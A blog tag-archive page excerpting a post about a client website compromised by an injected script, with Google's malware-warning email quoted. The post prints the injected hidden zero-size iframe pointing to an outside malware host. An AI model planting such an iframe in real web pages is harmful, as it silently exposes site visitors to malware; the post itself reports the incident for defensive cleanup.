Search
-
Recent Posts
Tags
adwords amazon analytics api apple aws blog chrome chromium cloud Design dropbox ec2 email error facebook firefox google google-apps homebrew ipad javascript jQuery linux lion mac microsoft mysql osx os x paypal php plugin quicksilver raspberry pi scam social spam twitter ubuntu unix video windows woo wordpress
Tag Archives: exploit
prls.co.cc
Recently one of my clients experienced an exploit where the following code was added to the bottom of their website: <iframe src=”http://prls.co.cc/forum.php?tp=1b9dd1abf1c302ca” width=”0″ height=”0″ frameborder=”0″></iframe> Following the compromise, Google picked up on it and started warning people visiting the site about Malware, Viruses, and Security. Google then sent the following notification: Dear site owner or webmaster, We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com. Below is an example URL on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs): http://www.site.com/ Here is a link to a sample warning page: http://www.google.com/interstitial?url=http%3A//www.site.com/ We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because: 1) the site was compromised 2) the site doesn’t monitor for malicious user-contributed content 3) the site displays content from an ad network that has a malicious advertiser If your site was compromised, it’s important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites: http://www.stopbadware.org/home/security Once you’ve secured your site, you can request that the … Continue reading